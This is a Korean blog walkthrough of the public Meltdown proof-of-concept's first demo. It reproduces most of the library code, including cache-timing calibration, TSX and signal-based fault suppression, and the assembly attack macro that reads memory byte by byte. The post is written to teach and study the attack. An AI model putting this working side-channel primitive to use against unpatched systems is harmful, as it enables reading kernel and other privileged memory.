Analyze the Meltdown demo #1: A first test(test)

Demo #1

Demo #1은 간단하게 현재 실험 PC가 meltdown에 취약한지, 즉 meltdown 공격으로 exploit 가능한 환경인지 test 하는 demo이다.

기존의 isolation mechanism을 breaking 하는 것이 아니라 user 자신의 address space를 meltdown 공격을 이용해 읽어들인다.

만일 demo 1에 실패했다면... CPU 문제(2010 이전의 CPU, 혹은 최신 실리콘 패치가 완료된 CPU) 등이 있을 수 있으니 반드시 demo 1이 정상적으로 작동하는 것을 확인하고 이후 demo로 넘어가는 것을 추천한다.

Build & Run

$ make
$ taskset 0x1 ./test

정상적인 결과화면은 다음과 같다.

Expect: Pay no attention to the content of this string
   Got: Pay no attention to the content of this string

Demo #1 source 분석

Demo #1에서 사용된 test.c의 소스코드는 다음과 같다.

main 함수부터 line by line으로 분석할 것이다. (Code 1. 참고)

  1 #include "libkdump.h"
  2 #include <stdio.h>
  3 #include <stdlib.h>
  4 #include <string.h>
  5 #include <time.h>
  6 
  7 const char *strings[] = {
  8     "If you can read this, at least the auto configuration is working",
  9     "Generating witty test message...",
 10     "Go ahead with the real exploit if you dare",
 11     "Have a good day.",
 12     "Welcome to the wonderful world of microarchitectural attacks",
 13     "Pay no attention to the content of this string",
 14     "Please wait while we steal your secrets...",
 15     "Would you like fries with that?",
 16     "(insert random quote here)",
 17     "Don't panic...",
 18     "Wait, do you smell something burning?",
 19     "How did you get here?"};
 20 
 21 int main(int argc, char *argv[]) {
 22   libkdump_config_t config;
 23   config = libkdump_get_autoconfig();
 24   libkdump_init(config);
 25 
 26   srand(time(NULL));
 27   const char *test = strings[rand() % (sizeof(strings) / sizeof(strings[0]))];
 28   int index = 0;
 29 
 30   printf("Expect: \x1b[32;1m%s\x1b[0m\n", test);
 31   printf("   Got: \x1b[33;1m");
 32   while (index < strlen(test)) {
 33     int value = libkdump_read((size_t)(test + index));
 34     printf("%c", value);
 35     fflush(stdout);
 36     index++;
 37   }
 38 
 39   printf("\x1b[0m\n");
 40   libkdump_cleanup();
 41 
 42   return 0;
 43 }

<Code 1. test.c>

Line 22: libkdump_config_t는 공격에 필요한 여러 데이터들을 structure로 관리한다. (Code 2. 참고)

/**
 * libkdump load thread action
 *
 * Selects what each background load thread does. libkdump_init() maps IO to
 * syncthread, YIELD to yieldthread, and NOP (or any other value) to
 * nopthread.
 */
typedef enum {
    NOP, /**< Just run an endless loop */
    IO, /**< Perform I/O operations to trigger interrupts */
    YIELD /**< Continuously switch to the operating system */
} libkdump_load_t;

/**
 * libkdump configuration
 *
 * Bundles every tunable of the attack. auto_config() detects
 * cache_miss_threshold and fault_handling at run time and sets the remaining
 * fields to: measurements = 3, accept_after = 1, load_threads = 1,
 * load_type = NOP, retries = 10000, physical_offset = DEFAULT_PHYSICAL_OFFSET.
 */
typedef struct {
  size_t cache_miss_threshold; /**< Cache miss threshold in cycles for Flush+Reload */
  libkdump_fault_handling_t fault_handling; /**< Type of fault handling (TSX or signal handler) */
  int measurements; /**< Number of measurements to perform for one address */
  int accept_after; /**< How many measurements must be the same to accept the read value */
  int load_threads; /**< Number of threads which are started to increase the chance of reading from inaccessible addresses */
  libkdump_load_t load_type; /**< Function the load threads should execute */
  int retries; /**< Number of Meltdown retries for an address */
  size_t physical_offset; /**< Address of the physical direct map */
} libkdump_config_t;

<Code 2. libkdump.h - libkdump_config_t structure>

Line 23: Line 22에서 선언한 config 자료구조를 default value로 초기화한다.

libkdump_get_autoconfig() 함수는 libkdump.c에서 찾아볼 수 있다. (Code 3. 참고)

Line 23에서 호출한 libkdump_get_autoconfig()는 auto_config() 함수를 호출하고 auto_config() 함수는 다음과 같은 일을 수행한다.

/* File-scope configuration read and written by the libkdump routines below. */
static libkdump_config_t config;

/**
 * Run the auto-configuration and return the result.
 *
 * Calls auto_config(), which overwrites the file-scope `config`, then returns
 * a copy of that structure by value.
 *
 * @return the freshly auto-configured libkdump_config_t
 */
libkdump_config_t libkdump_get_autoconfig() {
  auto_config();
  return config;
}

/**
 * Fill the file-scope `config` with detected and default values.
 *
 * The two detect_* helpers write config.fault_handling and
 * config.cache_miss_threshold; every other field is set to a fixed default.
 */
static void auto_config() {
  debug(INFO, "Auto configuration\n");
  detect_fault_handling();          // sets config.fault_handling (TSX or SIGNAL_HANDLER)
  detect_flush_reload_threshold();  // measures and sets config.cache_miss_threshold
  config.measurements = 3;          // measurements per address
  config.accept_after = 1;          // identical results needed to accept a value
  config.load_threads = 1;          // number of background load threads
  config.load_type = NOP;           // load threads run an endless loop
  config.retries = 10000;           // Meltdown retries per address
  config.physical_offset = DEFAULT_PHYSICAL_OFFSET;  // address of the physical direct map
}

<Code 3. libkdump.c - auto_config()>

detect_fault_handling(): 이 함수는 meltdown 공격시 발생하는 fault를 무엇으로 suppression 할지 결정하는 함수이다. 일반적으로 Intel TSX가 signal handler를 사용하는 것보다 성능이 좋기 때문에 내부적으로 현재 CPU가 TSX를 지원하는지 확인하고, TSX를 support한다면 TSX를 fault suppressing 하는데 사용한다. (Code 4. 참고)

// ---------------------------------------------------------------------------
/**
 * Report whether Intel TSX should be used.
 *
 * Build-time overrides take priority: FORCE_TSX always yields 1 (even when
 * NO_TSX is also defined), NO_TSX alone always yields 0. Without either
 * macro the CPU is queried: CPUID leaf 7, sub-leaf 0, EBX bit 11 (the RTM
 * feature flag in Intel's CPUID documentation).
 *
 * @return 1 if TSX is to be used, 0 otherwise
 */
static int check_tsx() {
#if defined(FORCE_TSX)
  return 1;
#elif defined(NO_TSX)
  return 0;
#else
  unsigned eax, ebx, ecx, edx;

  // Leaf 7 must exist before it can be queried.
  if (__get_cpuid_max(0, NULL) < 7) {
    return 0;
  }
  __cpuid_count(7, 0, eax, ebx, ecx, edx);
  return (int)((ebx >> 11) & 1u);
#endif
}

// ---------------------------------------------------------------------------
/**
 * Choose how faults are suppressed and record it in config.fault_handling.
 *
 * Uses TSX when check_tsx() reports it as available; otherwise falls back to
 * the signal handler. The decision is logged through debug().
 */
static void detect_fault_handling() {
  if (!check_tsx()) {
    debug(INFO, "No Intel TSX, fallback to signal handler\n");
    config.fault_handling = SIGNAL_HANDLER;
    return;
  }

  debug(SUCCESS, "Using Intel TSX\n");
  config.fault_handling = TSX;
}

<Code 4. libkdump.c - detect_fault_handling()>

detect_flush_reload_threshold(): Meltdown 공격을 이용할 때 cache에 encoding 한 값을 recover하기 위해서 flush+reload 공격을 사용한다. flush+reload는 cache hit과 miss의 timing difference를 이용하기 때문에 data load에 걸린 시간이 cache hit인지 miss인지 구별할 수 있어야 한다. threshold를 "(flush_reload_time + reload_time * 2) / 3"으로 계산하는 정확한 이유는 잘 모르겠지만 관습적으로 사용되는 것 같다. 이 식은 reload_time + (flush_reload_time - reload_time) / 3과 같으므로, threshold는 hit 평균과 miss 평균 사이에서 hit 쪽으로 1/3 지점에 놓인다. (Code 5. 참고)

// ---------------------------------------------------------------------------
/**
 * Calibrate the Flush+Reload threshold and store it in
 * config.cache_miss_threshold.
 *
 * Times `count` accesses to a stack location without flushing in between
 * (reload only), then `count` accesses each followed by a flush
 * (flush+reload), and averages both. The threshold is
 * (flush_reload_time + 2 * reload_time) / 3, i.e. one third of the way from
 * the reload-only average towards the flush+reload average.
 *
 * maccess(), flush() and rdtsc() are defined elsewhere; presumably a memory
 * read, a cache-line flush and a timestamp-counter read respectively.
 *
 * NOTE(review): the debug() format strings use %zd although the arguments
 * are size_t; %zu is the matching conversion.
 */
static void detect_flush_reload_threshold() {
  size_t reload_time = 0, flush_reload_time = 0, i, count = 1000000;
  size_t dummy[16];
  size_t *ptr = dummy + 8;  // probe address in the middle of the local array
  uint64_t start = 0, end = 0;

  maccess(ptr);  // touch once before timing starts
  for (i = 0; i < count; i++) {		// measure the cache hit cycles
    start = rdtsc();
    maccess(ptr);
    end = rdtsc();
    reload_time += (end - start);
  }
  for (i = 0; i < count; i++) {		// measure the cache miss cycles
    start = rdtsc();
    maccess(ptr);
    end = rdtsc();
    flush(ptr);  // flushed after timing, so the NEXT iteration's access is the one affected
    flush_reload_time += (end - start);
  }
  reload_time /= count;			// avg cycles of cache hit
  flush_reload_time /= count;	// avg cycles of cache miss

  debug(INFO, "Flush+Reload: %zd cycles, Reload only: %zd cycles\n",
        flush_reload_time, reload_time);
  config.cache_miss_threshold = (flush_reload_time + reload_time * 2) / 3;
  debug(SUCCESS, "Flush+Reload threshold: %zd cycles\n",
        config.cache_miss_threshold);
}

<Code 5. libkdump.c - detect_flush_reload_threshold()>

config.measurements = 3: one address에 대해 3번 측정을 한다.
config.accept_after = 1: 읽은 값을 확신하기 위해서 같은 값이 한 번 이상 나와야한다.
config.load_threads = 1: inaccessible address로부터 값을 read할 가능성을 높이기 위해서 실행할 thread의 수
config.load_type = NOP: endless loop를 실행한다.
config.retries = 10000: meltdown이 an address에 대해 retry 할 횟수
config.physical_offset = DEFAULT_PHYSICAL_OFFSET: physical direct map address, 즉 0xffff880000000000ull이다.

일반적으로 "ffff880000000000 - ffffc7ffffffffff" 공간이 direct mapping of all physical memory 영역이다.

Line 24: libkdump_init(config); 함수를 실행하여 meltdown 공격을 위한 준비를 수행한다. (Code 6. 참고)

// ---------------------------------------------------------------------------
/**
 * Prepare libkdump for subsequent libkdump_read() calls.
 *
 * Steps, in order:
 *  1. Copy `configuration` into the file-scope `config`; if it is
 *     byte-identical to libkdump_auto_config (presumably the "use automatic
 *     configuration" sentinel), run auto_config() instead.
 *  2. Validate the configuration with check_config() (defined elsewhere).
 *  3. Allocate the probe buffer, derive the page-aligned window `mem` inside
 *     it, fill it, and flush the first cache line of each of the 256 probe
 *     pages (one page per possible byte value).
 *  4. Start config.load_threads background threads running the function
 *     selected by config.load_type.
 *  5. If faults are handled by signal, install segfault_handler for SIGSEGV.
 *
 * @param configuration  settings to use
 * @return 0 on success, -1 on failure. This function sets errno to the
 *         check_config() error code, to ENOMEM when an allocation fails, or
 *         to the pthread_create() error code.
 */
int libkdump_init(const libkdump_config_t configuration) {
  int j;
  config = configuration;
  // Same bytes as libkdump_auto_config: let auto_config() fill in `config`.
  if (memcmp(&config, &libkdump_auto_config, sizeof(libkdump_config_t)) == 0) {
    auto_config();
  }

  int err = check_config();
  if (err != 0) {
    errno = err;
    return -1;
  }

  // 300 pages are allocated; only a 290-page window starting at `mem` is used.
  _mem = malloc(4096 * 300);
  if (!_mem) {
    errno = ENOMEM;
    return -1;
  }
  // Round _mem down to a page boundary, then advance two pages. Rounding down
  // may land before _mem, so `mem` ends up between 4097 and 8192 bytes past
  // _mem and the 290-page memset below stays inside the allocation.
  mem = (char *)(((size_t)_mem & ~0xfff) + 0x1000 * 2);
  memset(mem, 0xab, 4096 * 290);

  // Flush the start of each of the 256 probe pages (one per byte value).
  for (j = 0; j < 256; j++) {
    flush(mem + j * 4096);
  }

  load_thread = malloc(sizeof(pthread_t) * config.load_threads);
  // malloc(0) may legitimately return NULL, so only a NULL result for a
  // positive thread count is treated as an allocation failure.
  if (!load_thread && config.load_threads > 0) {
    free(_mem);
    errno = ENOMEM;
    return -1;
  }

  void *thread_func;
  switch (config.load_type) {
  case IO:
    thread_func = syncthread;
    break;
  case YIELD:
    thread_func = yieldthread;
    break;
  case NOP:
  default:
    thread_func = nopthread;
  }

  for (j = 0; j < config.load_threads; j++) {
    int r = pthread_create(&load_thread[j], 0, thread_func, 0);
    if (r != 0) {
      // Creation failed: cancel the threads already started and release
      // everything allocated above.
      int k;
      for (k = 0; k < j; k++) {
        pthread_cancel(load_thread[k]);
      }
      free(load_thread);
      free(_mem);
      errno = r;
      return -1;
    }
  }
  debug(SUCCESS, "Started %d load threads\n", config.load_threads);

  // Without TSX, faults are caught through a SIGSEGV handler instead.
  if (config.fault_handling == SIGNAL_HANDLER) {
    if (signal(SIGSEGV, segfault_handler) == SIG_ERR) {
      debug(ERROR, "Failed to setup signal handler\n");
      libkdump_cleanup();
      return -1;
    }
    debug(SUCCESS, "Successfully setup signal handler\n");
  }
  return 0;
}

<Code 6. libkdump.c - libkdump_init()>

parameter로 받은 configuration 변수를 사용자가 설정했는지를 확인한다. 만일 직접 설정을 했다면 따로 configuration 변수를 초기화하지 않는다.

check_config() 함수를 호출하여 이전에 측정한 threshold가 올바른 값인지 확인한다.

"4KB * 300" 크기를 갖는 메모리(mem)를 할당한다. 추후 meltdown 공격으로 읽은 값을 이 메모리(배열)에 인코딩한다.

이 메모리(mem)의 starting address를 페이지 단위로 접근하도록 하위 12bit를 0으로 마스킹한다.

(처음 2개의 페이지는 사용하지 않는데.. 정확한 이유는 모르겠다... 다만 하위 12bit를 0으로 내림하면 _mem보다 앞선 주소가 될 수 있으므로, 할당된 영역 안에 머물려면 최소 한 페이지는 더해야 한다.)

메모리(mem)를 구성하는 여러 페이지의 첫 번째 cache line을 flush 한다.

meltdown을 이용해 inaccessible address를 접근하여 데이터를 read할 가능성을 높이기 위해 dummy instruction을 계속 수행하는 thread를 생성한다.

만일 fault를 signal handler로 suppressing 하면 signal handler를 등록한다.

Line 26-27: strings[] 배열의 여러 string 중 하나만 선정하여 test 변수에 저장한다.

Line 32-37: test 변수가 가리키는 문자열을 한 byte 씩 meltdown을 이용해서 읽는다. libkdump_read()를 호출하여 1 byte read를 수행 (Code 7. 참고)

// ---------------------------------------------------------------------------
/**
 * Read one byte at `addr` through the Meltdown primitive.
 *
 * Publishes `addr` in the file-scope `phys` (the address the MELTDOWN macro
 * dereferences), performs config.measurements single reads via
 * libkdump_read_tsx() or libkdump_read_signal_handler() depending on
 * config.fault_handling, and tallies how often each value was returned.
 *
 * The tallies are kept as int: a char counter would overflow as soon as
 * config.measurements exceeds CHAR_MAX.
 *
 * @param addr  address to read from
 * @return the non-zero value (1..255) seen most often, provided it was seen
 *         at least config.accept_after times; ties go to the lowest value.
 *         0 if no value qualifies. A zero byte is therefore indistinguishable
 *         from a failed read.
 */
int __attribute__((optimize("-O0"))) libkdump_read(size_t addr) {
  phys = addr;

  int res_stat[256];
  int i, r;
  for (i = 0; i < 256; i++)
    res_stat[i] = 0;

  sched_yield();

  for (i = 0; i < config.measurements; i++) {
    if (config.fault_handling == TSX) {
      r = libkdump_read_tsx();
    } else {
      r = libkdump_read_signal_handler();
    }
    res_stat[r]++;
  }
  int max_v = 0, max_i = 0;

  // Debug output: list every value that was observed at least once.
  if (dbg) {
    for (i = 0; i < 256; i++) {
      if (res_stat[i] == 0)
        continue;
      debug(INFO, "res_stat[%x] = %d\n",
            i, res_stat[i]);
    }
  }

  // Index 0 is skipped: the single-read helpers return 0 for "nothing found".
  for (i = 1; i < 256; i++) {
    if (res_stat[i] > max_v && res_stat[i] >= config.accept_after) {
      max_v = res_stat[i];
      max_i = i;
    }
  }
  return max_i;
}

<Code 7. libkdump.c - libkdump_read()>

res_stat[256] 변수를 선언한다. 이 변수는 이후 meltdown으로 읽어들인 변수 값의 횟수를 기록하는데 사용된다.

따라서 res_stat[256]의 element를 모두 0으로 초기화한다.

sched_yield()를 정확히 왜 사용하는지는 잘 모르겠다.... ㅠ

이전에 설정한 횟수만큼 한 바이트 read를 반복하고 나온 값을 res_stat[] 변수를 이용해 counting한다.

여기서 CPU가 TSX를 supporting 하는지 하지 않는지에 따라 libkdump_read_tsx()와 libkdump_read_signal_handler()로 나뉜다.

res_stat 변수중 가장 많이 나온 값을 meltdown이 읽어들인 값으로 생각한다.

좀 더 libkdump_read_tsx() 함수를 자세히 보자. (Code 8. 참고)

/**
 * One Meltdown read attempt using TSX for fault suppression.
 *
 * Repeats up to config.retries + 1 times: run MELTDOWN inside an
 * xbegin()/xend() pair (helpers defined elsewhere; presumably wrappers around
 * the TSX begin/end instructions), then probe the 256 pages of `mem` with
 * flush_reload().
 *
 * When NO_TSX is defined the whole body is compiled out and the function
 * always returns 0.
 *
 * @return the index (1..255) of the first probe page reported as a hit, or 0
 *         if no attempt produced one. A hit on page 0 is ignored.
 *
 * NOTE(review): `start` and `end` are never used in this function.
 */
int __attribute__((optimize("-Os"), noinline)) libkdump_read_tsx() {
#ifndef NO_TSX
  size_t retries = config.retries + 1;  // post-decrement loop below runs exactly this many times
  uint64_t start = 0, end = 0;

  while (retries--) {
    // Only execute MELTDOWN if the transaction actually started.
    if (xbegin() == _XBEGIN_STARTED) {
      MELTDOWN;
      xend();
    }
    int i;
    // Probe one page per possible byte value; flush_reload() also re-flushes
    // each page it probes.
    for (i = 0; i < 256; i++) {
      if (flush_reload(mem + i * 4096)) {
        if (i >= 1) {
          return i;
        }
      }
      sched_yield();
    }
    sched_yield();
  }
#endif
  return 0;
}

<Code 8. libkdump.c - libkdump_read_tsx()>

#ifndef NO_TSX ~ #endif는 NO_TSX가 정의되어 있지 않을 때만 해당 block을 컴파일에 포함한다는 뜻이다. NO_TSX가 정의되어 있으면 이 함수는 항상 0을 return 한다.

retries 변수에 일전에 설정한 retries 값을 할당한다.

xbegin() ~ xend()로 MELTDOWN을 감싸 실행한다. MELTDOWN 코드가 하나의 transaction으로 실행된다.

MELTDOWN 공격으로 인해 읽어들인 값은 이전에 설정한 mem에 인코딩 될 것이고 flush_reload 기술을 이용해 이를 디코딩한다.

정상적으로 값을 읽으면 해당 값("i")를 return하고 정상적으로 값 읽기에 실패하면 0을 return 한다.

좀 더 MELTDOWN 코드를 자세히 보자. (Code 9. 참고)

/* Default attack sequence: unless MELTDOWN was already defined (e.g. on the
 * compiler command line), it expands to meltdown_nonull. */
#ifndef MELTDOWN
#define MELTDOWN meltdown_nonull
#endif

#ifdef __x86_64__

// ---------------------------------------------------------------------------
/*
 * meltdown_nonull: the attack sequence, expanded in place as a single asm
 * statement.
 *
 * Operands: phys is passed in %rcx ("c") and mem in %rbx ("b"); %rax is
 * declared as clobbered. There are no output operands, so the macro yields
 * no value.
 *
 *   1:                         local label, retry target
 *   movzx (%rcx), %rax         load from the address held in %rcx (phys),
 *                              zero-extended into %rax
 *   shl $12, %rax              multiply the loaded value by 4096
 *   jz 1b                      if the shifted value is zero, jump back to 1
 *   movq (%rbx,%rax,1), %rbx   load from mem + value * 4096; this is the
 *                              access that flush_reload() later looks for
 *
 * NOTE(review): the last instruction writes %rbx although "b"(mem) is an
 * input-only operand; GCC's extended-asm rules say input operands must not
 * be modified. Confirm whether this is intentional.
 */
#define meltdown_nonull                                                        \
  asm volatile("1:\n"                                                          \
               "movzx (%%rcx), %%rax\n"                                         \
               "shl $12, %%rax\n"                                              \
               "jz 1b\n"                                                       \
               "movq (%%rbx,%%rax,1), %%rbx\n"                                 \
               :                                                               \
               : "c"(phys), "b"(mem)                                           \
               : "rax");

<Code 9. libkdump.c - MELTDOWN (meltdown_nonull) macro>

phys(읽을 대상 주소)는 %%rcx에, mem(probe 배열의 시작 주소)은 %%rbx에 할당된다.

movzx (%%rcx), %%rax\n: %%rcx가 가리키는 주소(phys)에서 값을 읽어 zero-extend 하여 %%rax에 저장한다. (즉 *phys의 값을 %%rax에 mov 한다.)

shl $12, %%rax: %%rax의 값을 12bit shift left 한다. (%%rax * 4096)

jz 1b\n: shift 결과가 0이면 label 1로 돌아가 retry 한다.

movq (%%rbx, %%rax, 1), %%rbx\n: %%rbx에 *(mem + %%rax * 1)을 load 한다. 즉 load를 시도한다.

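이 asm에는 output operand가 없으므로 값을 직접 return 하지는 않는다. %%rax는 clobber로만 선언되어 있고, 읽은 값은 mem + (값 * 4096) 위치가 cache에 load되는 것으로 인코딩된다.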

Meltdown으로 cache에 인코딩한 값을 decoding 하기 위해서 flush_reload를 이용한다. (Code 10. 참고)

/**
 * Probe one address: time a single access, then flush it again.
 *
 * maccess(), flush() and rdtsc() are defined elsewhere; presumably a memory
 * read, a cache-line flush and a timestamp-counter read respectively.
 *
 * @param ptr  address to probe
 * @return 1 if the access took fewer than config.cache_miss_threshold
 *         cycles (treated as a cache hit), 0 otherwise
 */
static int __attribute__((always_inline)) flush_reload(void *ptr) {
  uint64_t start = 0, end = 0;

  start = rdtsc();
  maccess(ptr);
  end = rdtsc();

  // Flush unconditionally so the next probe of this address starts clean.
  flush(ptr);

  if (end - start < config.cache_miss_threshold) {
    return 1;
  }
  return 0;
}

이전 libkdump_init() 함수에서 모든 ptr이 가리키는 주소를 flush 했기 때문에 Meltdown 공격에 의해 encoding 된 값만 cache에 load되어 있을 것이다.

각각, ptr을 접근하는데 걸리는 시간을 측정하고 다음 바이트 읽을 때 사용을 위해 ptr을 flush한다.

ptr을 load하는데 걸리는 시간이 config.cache_miss_threshold보다 작으면 cache hit으로 판단하여 return 1을 하고, 성공적으로 byte 읽기에 성공했음을 알린다.

참고문헌: github.com/IAIK/meltdown

저작자표시 비영리 변경금지

'CPU side-channel attack' 카테고리의 다른 글

[Paper Review] AMD Prefetch Attacks through Power and Time (0)	2023.01.26
[Ubuntu 20.04] How to disable the KPTI (0)	2021.01.20

marco